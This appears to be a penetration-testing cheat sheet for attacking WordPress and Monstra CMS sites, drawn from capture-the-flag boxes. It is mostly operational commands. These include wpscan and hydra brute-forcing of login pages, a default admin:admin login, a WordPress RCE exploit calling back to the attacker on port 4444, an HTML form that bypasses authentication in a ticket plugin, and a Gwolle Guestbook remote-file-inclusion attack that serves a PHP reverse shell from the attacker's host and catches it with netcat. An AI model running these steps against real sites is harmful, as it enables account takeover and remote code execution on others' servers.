Wordpress

Investigate

https://$IP/webservices/wp
https://$IP/webservices/wp/wp-login.php

/wordpress/   ....suggests we have a very fertile ground for planting an attack. User access = shell.
/phpmyadmin/  ....suggests there is a database ready to plunder.
/info.php     .....gives us Kernel, hostname and OS information immediately.

wpscan

Wordpress Vuln Scanner
> wpscan --url $IP
> wpscan --url https://$IP --disable-tls-checks

Enum plugins
> wpscan --url http://$IP/webservices/wp/ --enumerate p
> wpscan --url http://$IP/webservices/wp -e ap --log wpscan.out  ...ap=all plugs

Enum plugins/themes/users
> wpscan --url http://$IP/webservices/wp -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive --api-token GetYourOwnAPIKey 2>&1

Brute with known user: 'elliot'
> wpscan --url 192.168.50.102 -U elliot --passwords ./fsocity_uniq.dic






-----------------------
-----------------------
Monstra
https://$IP/webservices/monstra-3.0.4/
https://$IP/webservices/monstra-3.0.4/admin/

admin:admin  ..default works!

Try to edit themes! 
They are often php

Monstra > Extends > Themes
"Helloworld" > Save ..fails


System > Backup ..not created (not writeable)
Content > Files ..new directory (created)
Content > Files > File ..Fails


System > Settings > Maintenance Mode
<?php phpinfo(); ?>   ..Save Fails
Hello                 ..Save Fails


-----------------------
-----------------------
searchsploit monstra
github monstra > Issues > 
php code execution
Look for sqli or lfi


-----------------------
-----------------------

Wordpress RCE Exploits

wordpress-rce-exploit.sh 
wordpress-rce-exploit.py  --python version

> sudo python ./wordpress-rce-exploit.py http://$IP/wp-login.php $MyIP:4444 admin

wp curl trick

Tries to catch the 'enter new password link'
> curl -H "Host: $IP" --data "user_login=admin&redirect_to=&wp-submit=Get+New+Password" http://$IP/wp-login.php?action=lostpassword

wp-support-plus-responsive-ticket-system

> wpscan --url https://$IP --disable-tls-checks

wp-support-plus-responsive-ticket-system
Version: 7.1.3 


> searchsploit -x 41006.txt

<form method="post" action="http://wp/wp-admin/admin-ajax.php">
        Username: <input type="text" name="username" value="administrator">
        <input type="hidden" name="email" value="sth">
        <input type="hidden" name="action" value="loginGuestFacebook">
        <input type="submit" value="Login">
</form>

Save as hello.html
Serve: python3 -m http.server
http://localhost/hello.html

Reload page - Now Admin!!
https://brainfuck.htb/?page_id=6
https://brainfuck.htp/wp-admin/admin-ajax.php

Brute Force Username - Hydra

> hydra -vV -L users.dic -p wedontcare 192.168.50.102 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'

Gwolle Guestbook RFI

TartarsauceHTB
Check your version:
- http://$IP/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
Basically:
- http://$IP...ajaxresponse?abspath=http://$MyIP/
- Place an evil 'wp-load.php' (actually reverse PHP) on your local web server

-------------------------
searchsploit gwolle
searchsploit -x 38861  ..read
Remote File Inclusion (RFI) - Found for 1.5.3

-------------------------
RFI:
http://$IP/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://$MyIP

-------------------------
Prep:
locate php-reverse
cp /usr/share/webshells/php/php-reverse-shell.php wp-load.php
vim wp-load.php
python -m SimpleHTTPServer 80

-------------------------
Exploit:
curl -s http://$IP/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://$MyIP/
(keep the trailing / or else this wont work)
nc -lvnp 7500
connected!

PreviousWeb Scrape Next05 Passwords & Ciphers

Last updated 2 years ago

Was this helpful?